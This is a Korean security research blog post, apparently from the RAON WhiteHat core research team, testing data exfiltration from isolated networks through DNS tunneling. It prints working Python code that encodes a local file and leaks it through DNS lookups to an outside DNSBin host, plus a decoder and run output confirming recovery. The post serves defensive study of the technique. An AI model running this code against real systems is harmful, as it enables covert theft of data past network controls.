<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta name="google-site-verification" content="soS2al0KuMZmiyPzu87KFbqGSn0K9edQ8EkWp_m35n0" />
  

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<title>DNS Tunneling을 통한 정보 유출 | Core-Research-Team</title>
<meta name="generator" content="Jekyll v4.0.1" />
<meta property="og:title" content="DNS Tunneling을 통한 정보 유출" />
<meta name="author" content="qbeom" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="라온화이트햇 핵심연구팀 최규범" />
<meta property="og:description" content="라온화이트햇 핵심연구팀 최규범" />
<link rel="canonical" href="http://202.182.127.225:4000/2020-05-01/DNS-Tunneling" />
<meta property="og:url" content="http://202.182.127.225:4000/2020-05-01/DNS-Tunneling" />
<meta property="og:site_name" content="Core-Research-Team" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-05-01T00:00:00+00:00" />
<script type="application/ld+json">
{"@type":"BlogPosting","headline":"DNS Tunneling을 통한 정보 유출","dateModified":"2020-05-01T00:00:00+00:00","datePublished":"2020-05-01T00:00:00+00:00","author":{"@type":"Person","name":"qbeom"},"url":"http://202.182.127.225:4000/2020-05-01/DNS-Tunneling","mainEntityOfPage":{"@type":"WebPage","@id":"http://202.182.127.225:4000/2020-05-01/DNS-Tunneling"},"description":"라온화이트햇 핵심연구팀 최규범","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


  <!-- CSS -->
  <link rel="stylesheet" href="/assets/main.css">
  <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Libre+Baskerville:400,400i,700">

  <!-- Favicon -->
  <link rel="icon" type="image/png" sizes="32x32" href="/assets/favicon.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/assets/favicon.png">
  <link rel="apple-touch-icon" sizes="180x180" href="/assets/favicon.ico">

  <!-- RSS -->
  <link type="application/atom+xml" rel="alternate" href="http://202.182.127.225:4000/feed.xml" title="Core-Research-Team" />

  <!-- Google Analytics-->
  
 
</head>


  <body>

    <nav class="nav">
  <div class="nav-container">
    <a href="/">
      <h2 class="nav-title">RAON - Core Research Team</h2>
    </a>
    <ul>
      <li><a href="/about">About</a></li>
      <li><a href="/">Posts</a></li>
    </ul>
  </div>
</nav>


    <main>
      <div class="post"> 
   <h1 class="post-title">DNS Tunneling을 통한 정보 유출</h1>
   <div class="post-line"></div>

   
      
         
            <span class="tag"><center><i>Research</i></center></span>
         
      
         
      
   
   
   
   
   <p>라온화이트햇 핵심연구팀 최규범</p>

<ul>
  <li>
    <p><strong>목차</strong></p>

    <hr />

    <hr />
  </li>
</ul>

<h3 id="개요">개요</h3>

<p>인터넷 접속이 안되는 내부망 환경에서, 다양한 보안 솔루션이 설치되었어도,
과연, 정보 유출의 위협으로 부터 안전할까요?</p>

<p>DNS Tunneling 기법을 활용하여 위와 같은 환경에서 정보 유출이 가능한지 테스트해보았습니다.</p>

<h3 id="dns-tunneling">DNS Tunneling</h3>

<p>DNS 프로토콜을 사용하여 임의 데이터를 송수신하는 기술을 DNS Tunneling이라고 합니다.</p>

<p>실제로 많은 악성코드가 원격 명령지 서버와 통신할 때 DNS Tunneling을 악용하고 있습니다.</p>

<p><img src="/assets/55daf833-d832-4e6a-8182-f78cb29bbda9/0b681e3d-c7f7-468a-94b5-a69801ddf46b.png" alt="/assets/55daf833-d832-4e6a-8182-f78cb29bbda9/0b681e3d-c7f7-468a-94b5-a69801ddf46b.png" /></p>

<p>그 이유는 내부망 환경 또는 특정 Outbound 포트만 허용되는 환경에서도, DNS 트래픽 송신이 허용되는 경우가 빈번하기 때문입니다.</p>

<p><img src="/assets/8d3b6cad-8833-4398-9c11-2499aa7ba03b/fa591cf7-266f-40c6-b901-d813de4ecb95.png" alt="/assets/8d3b6cad-8833-4398-9c11-2499aa7ba03b/fa591cf7-266f-40c6-b901-d813de4ecb95.png" /></p>

<p>공격자가 설치한 임의 DNS 서버의 특정 서브 도메인을 조회합니다.
해당 DNS 패킷에서 서브 도메인 정보(‘leakeddata’)만 구별하여 정보를 획득할 수 있습니다.</p>

<h3 id="유출-테스트">유출 테스트</h3>

<p>DNS Tunneling 구현을 위해서는 DNS 서버 구축이 필요합니다.</p>

<ul>
  <li>
    <p>Python을 사용하여 DNS Tunneling 구현</p>

    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [https://github.com/ialexryan/Burrow-Server](https://github.com/ialexryan/Burrow-Server)
</code></pre></div>    </div>
  </li>
</ul>

<p>Python을 사용하여 구축할 수 있는 Github 페이지를 확인하였으나, 여러 추가 작업이 필요합니다.</p>

<p><img src="/assets/ca576997-b4d8-4c2d-8a2f-3f069cbeb5fc/924c39e7-e437-4cfe-9ed2-fa852a6f5294.png" alt="/assets/ca576997-b4d8-4c2d-8a2f-3f069cbeb5fc/924c39e7-e437-4cfe-9ed2-fa852a6f5294.png" /></p>

<p>쉬운 방법을 찾던 중, CTF에서도 활용되는 DNSBin(http://dnsbin.zhack.ca/) 페이지를 발견했습니다.</p>

<p><img src="/assets/a4c1412c-c001-475b-b52f-c8cd7303d8a2/82361422-e8d7-49d1-b0f7-5151fa0faa9d.png" alt="/assets/a4c1412c-c001-475b-b52f-c8cd7303d8a2/82361422-e8d7-49d1-b0f7-5151fa0faa9d.png" /></p>

<p><img src="/assets/05830fe9-e5d6-4dc1-b41b-ca518de63374/4b25fd46-25c7-40b6-90a5-a10cfc883d74.png" alt="/assets/05830fe9-e5d6-4dc1-b41b-ca518de63374/4b25fd46-25c7-40b6-90a5-a10cfc883d74.png" /></p>

<p>식별 가능한 특정 서브 도메인이 주어지고, 해당 도메인 앞에 임의 데이터를 붙여서 보내면
서버에서 데이터를 가져옵니다.</p>

<p>도메인 이름 규칙 상 대소문자 구분이 없지만, 해당 사이트에서는 이를 구분하여 보여줍니다.</p>

<h3 id="테스트-코드송신">테스트 코드(송신)</h3>

<p>아래 내용을 통해 송신 테스트 코드를 작성하였습니다.</p>

<ul>
  <li>도메인 이름 규칙 상 허용되는 63개 문자 중, 하이픈(-)을 제외한 62개 문자로 구성</li>
  <li>Raw Data를 보내기 위해서 인코딩이 필요하므로, 간단히 쓸 수 있는 Base32를 사용
(Base62를 사용하고 싶으나, 정수형으로 인자를 받기 때문에 복잡하였습니다.)</li>
  <li>Dnsbin에서 중복 데이터를 표시하지 않으므로, 중복을 피하기 위해 간단한 암호화 필요</li>
  <li>도메인은 최대 253 글자, 라벨은 63글자로 구성되므로 알맞게  잘라서 송신</li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">base64</span>

<span class="k">def</span> <span class="nf">rand_bytes</span><span class="p">(</span><span class="n">count</span><span class="p">):</span>
    <span class="k">return</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">count</span><span class="p">))</span>

<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"./test.dat"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
<span class="n">f</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

<span class="n">size</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Data Size(Org) : "</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span>

<span class="n">seed</span> <span class="o">=</span> <span class="n">random</span><span class="p">.</span><span class="n">randint</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="mi">100000</span><span class="p">)</span>
<span class="n">random</span><span class="p">.</span><span class="n">seed</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span>

<span class="n">enc</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="n">rnd</span> <span class="o">=</span> <span class="n">rand_bytes</span><span class="p">(</span><span class="n">size</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">size</span><span class="p">):</span>
    <span class="n">enc</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^</span> <span class="n">rnd</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>

<span class="n">enc</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b32encode</span><span class="p">(</span><span class="n">enc</span><span class="p">)</span>
<span class="n">enc</span> <span class="o">=</span> <span class="n">enc</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">b"="</span><span class="p">,</span> <span class="s">b"0"</span><span class="p">)</span> <span class="c1"># Change pad
</span><span class="n">size_enc</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">enc</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Data Size(Enc) : "</span><span class="p">,</span> <span class="n">size_enc</span><span class="p">)</span>

<span class="n">base_domain</span> <span class="o">=</span> <span class="s">'.9b14918384f099f6b54a.d.zhack.ca'</span>
<span class="n">remain</span> <span class="o">=</span> <span class="mi">253</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">base_domain</span><span class="p">)</span> <span class="c1"># Max Length 253
</span><span class="n">remain</span> <span class="o">-=</span> <span class="nb">int</span><span class="p">(</span><span class="n">remain</span><span class="o">/</span><span class="mi">63</span><span class="p">)</span> <span class="c1"># "."
</span><span class="n">t_start</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">()</span>

<span class="n">send_data</span> <span class="o">=</span> <span class="s">"S-%d.O-%d.E-%d"</span> <span class="o">%</span> <span class="p">(</span><span class="n">seed</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">size_enc</span><span class="p">)</span> <span class="c1">#Send seed, size of data
</span><span class="n">socket</span><span class="p">.</span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">send_data</span> <span class="o">+</span> <span class="n">base_domain</span><span class="p">)</span>

<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">size_enc</span><span class="p">,</span> <span class="n">remain</span><span class="p">):</span>
    <span class="n">enc_part</span> <span class="o">=</span> <span class="n">enc</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="n">remain</span><span class="p">]</span>
    <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">enc_part</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">63</span><span class="p">:</span>
        <span class="n">send_data</span> <span class="o">=</span> <span class="s">""</span>
        <span class="k">for</span> <span class="n">j</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">remain</span><span class="p">,</span> <span class="mi">63</span><span class="p">):</span>
            <span class="k">if</span> <span class="n">j</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
                <span class="n">send_data</span> <span class="o">+=</span> <span class="s">"."</span>
            <span class="n">send_data</span> <span class="o">+=</span> <span class="n">enc_part</span><span class="p">[</span><span class="n">j</span><span class="p">:</span><span class="n">j</span><span class="o">+</span><span class="mi">63</span><span class="p">].</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">send_data</span> <span class="o">=</span> <span class="n">enc_part</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">)</span>

    <span class="n">socket</span><span class="p">.</span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">send_data</span> <span class="o">+</span> <span class="n">base_domain</span><span class="p">)</span>

<span class="n">t</span> <span class="o">=</span> <span class="n">time</span><span class="p">.</span><span class="n">time</span><span class="p">()</span> <span class="o">-</span> <span class="n">t_start</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Elapsed Time : "</span><span class="p">,</span> <span class="n">t</span><span class="p">,</span> <span class="s">"Secs"</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Speed(Org) : "</span><span class="p">,</span> <span class="n">size</span> <span class="o">/</span> <span class="n">t</span><span class="p">,</span> <span class="s">"B/sec"</span><span class="p">)</span> 
<span class="k">print</span><span class="p">(</span><span class="s">"Speed(Enc) : "</span><span class="p">,</span> <span class="n">size_enc</span> <span class="o">/</span> <span class="n">t</span><span class="p">,</span> <span class="s">"B/sec"</span><span class="p">)</span>
</code></pre></div></div>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Data</span> <span class="n">Size</span><span class="p">(</span><span class="n">Org</span><span class="p">)</span> <span class="p">:</span>  <span class="mi">21822</span>
<span class="n">Data</span> <span class="n">Size</span><span class="p">(</span><span class="n">Enc</span><span class="p">)</span> <span class="p">:</span>  <span class="mi">34920</span>
<span class="n">Elapsed</span> <span class="n">Time</span> <span class="p">:</span>  <span class="mf">37.387837171554565</span> <span class="n">Secs</span>
<span class="n">Speed</span><span class="p">(</span><span class="n">Org</span><span class="p">)</span> <span class="p">:</span>  <span class="mf">583.6657493684237</span> <span class="n">B</span><span class="o">/</span><span class="n">sec</span>
<span class="n">Speed</span><span class="p">(</span><span class="n">Enc</span><span class="p">)</span> <span class="p">:</span>  <span class="mf">933.9935829871392</span> <span class="n">B</span><span class="o">/</span><span class="n">sec</span>
<span class="o">&gt;&gt;&gt;</span>
</code></pre></div></div>

<p>21.3KB의 파일을 테스트하였고, 약 0.5KB/s 속도로 전송되었습니다.</p>

<p>결과는 네트워크 환경에 따라 다를 수 있다.</p>

<h3 id="테스트-코드수신">테스트 코드(수신)</h3>

<p><img src="/assets/21cacb46-3992-4c22-a4da-da78bb38ed70/8f4736de-b36e-44bf-abad-0cd87c3445d4.png" alt="/assets/21cacb46-3992-4c22-a4da-da78bb38ed70/8f4736de-b36e-44bf-abad-0cd87c3445d4.png" /></p>

<p>DNS를 요청하는 과정에서 중복된 값이 전송될 수 있습니다.</p>

<p>이를 처리해주고 초기에 전송한 Seed를 통해 복호화하는 코드를 작성하였습니다.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">random</span>
<span class="kn">import</span> <span class="nn">base64</span>

<span class="k">def</span> <span class="nf">rand_bytes</span><span class="p">(</span><span class="n">count</span><span class="p">):</span>
    <span class="k">return</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">random</span><span class="p">.</span><span class="n">getrandbits</span><span class="p">(</span><span class="mi">8</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">count</span><span class="p">))</span>

<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"./result.dat"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
<span class="n">f</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

<span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="n">split</span><span class="p">(</span><span class="s">b"</span><span class="se">\r\n</span><span class="s">"</span><span class="p">)</span>
<span class="n">info</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">split</span><span class="p">(</span><span class="s">b"."</span><span class="p">)</span>

<span class="n">seed</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">size_enc</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="mi">2</span><span class="p">:]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="mi">2</span><span class="p">:]),</span> <span class="nb">int</span><span class="p">(</span><span class="n">info</span><span class="p">[</span><span class="mi">2</span><span class="p">][</span><span class="mi">2</span><span class="p">:])</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Seed : "</span><span class="p">,</span> <span class="n">seed</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Data Size(Org) : "</span><span class="p">,</span> <span class="n">size</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Data Size(Enc) : "</span><span class="p">,</span> <span class="n">size_enc</span><span class="p">)</span>

<span class="n">random</span><span class="p">.</span><span class="n">seed</span><span class="p">(</span><span class="n">seed</span><span class="p">)</span>
<span class="n">rnd</span> <span class="o">=</span> <span class="n">rand_bytes</span><span class="p">(</span><span class="n">size</span><span class="p">)</span>

<span class="n">enc</span> <span class="o">=</span> <span class="s">b""</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)):</span>
    <span class="k">if</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
        <span class="k">continue</span>
    <span class="n">enc</span> <span class="o">+=</span> <span class="n">data</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
<span class="n">enc</span> <span class="o">=</span> <span class="n">enc</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">b"."</span><span class="p">,</span> <span class="s">b""</span><span class="p">)</span>
<span class="n">enc</span> <span class="o">=</span> <span class="n">enc</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="s">b"0"</span><span class="p">,</span> <span class="s">b"="</span><span class="p">)</span>
<span class="n">dec</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b32decode</span><span class="p">(</span><span class="n">enc</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="s">"Data Size(Enc-Recv) : "</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">enc</span><span class="p">))</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Data Size(Dec-Recv) : "</span><span class="p">,</span> <span class="nb">len</span><span class="p">(</span><span class="n">dec</span><span class="p">))</span>

<span class="n">dec</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">(</span><span class="n">dec</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">size</span><span class="p">):</span>
    <span class="n">dec</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">^=</span> <span class="n">rnd</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>

<span class="n">f</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"./test.dat"</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">)</span>
<span class="n">org</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
<span class="n">f</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Compare Result :"</span><span class="p">,</span> <span class="n">org</span> <span class="o">==</span> <span class="n">dec</span><span class="p">)</span>
</code></pre></div></div>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">Seed</span> <span class="p">:</span>  <span class="mi">70953</span>
<span class="n">Data</span> <span class="n">Size</span><span class="p">(</span><span class="n">Org</span><span class="p">)</span> <span class="p">:</span>  <span class="mi">21822</span>
<span class="n">Data</span> <span class="n">Size</span><span class="p">(</span><span class="n">Enc</span><span class="p">)</span> <span class="p">:</span>  <span class="mi">34920</span>
<span class="n">Data</span> <span class="n">Size</span><span class="p">(</span><span class="n">Enc</span><span class="o">-</span><span class="n">Recv</span><span class="p">)</span> <span class="p">:</span>  <span class="mi">34920</span>
<span class="n">Data</span> <span class="n">Size</span><span class="p">(</span><span class="n">Dec</span><span class="o">-</span><span class="n">Recv</span><span class="p">)</span> <span class="p">:</span>  <span class="mi">21822</span>
<span class="n">Compare</span> <span class="n">Result</span> <span class="p">:</span> <span class="bp">True</span>
<span class="o">&gt;&gt;&gt;</span>
</code></pre></div></div>

<p>결과 파일(result.dat)은 Dnsbin에서 출력된 텍스트를 저장한 파일입니다.</p>

<p>전송된 데이터가 정상적으로 복호화된 것을 확인할 수 있습니다.</p>

<h3 id="참조">참조</h3>

<ul>
  <li>도메인 이름 규칙(<a href="https://www.joinc.co.kr/w/man/12/DNS">https://www.joinc.co.kr/w/man/12/DNS</a>)</li>
</ul>

   </div>
</div>


  <!-- Start disqus 
<script src="/assets/js/disqusLoader.js" /></script>
<div id="disqus_thread"><h3>Discussion and feedback</h3></div>
<div class="disqus"></div>
<script>
    disqusLoader('.disqus', {
        scriptUrl: 'https://jekyll-tale.disqus.com/embed.js'
    });
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
End disqus -->


<div class="pagination">
  
   <a href="/2020-05-01/Dockerfile-Docker-Compose-Project" class="left arrow">&#8592;</a>
  
  
   <a href="/2020-05-01/CVE-2020-8835" class="right arrow">&#8594;</a>
  

  <a href="#" class="top">Top</a>
</div>
    </main>

    <!--footer>
  <span>
    &copy; <time datetime="2021-01-13 00:53:43 +0000">2021</time> Core-Research-Team. Made with Jekyll using the <a href="https://github.com/chesterhow/tale/">Tale</a> theme.
  </span>
</footer-->

  </body>
</html>
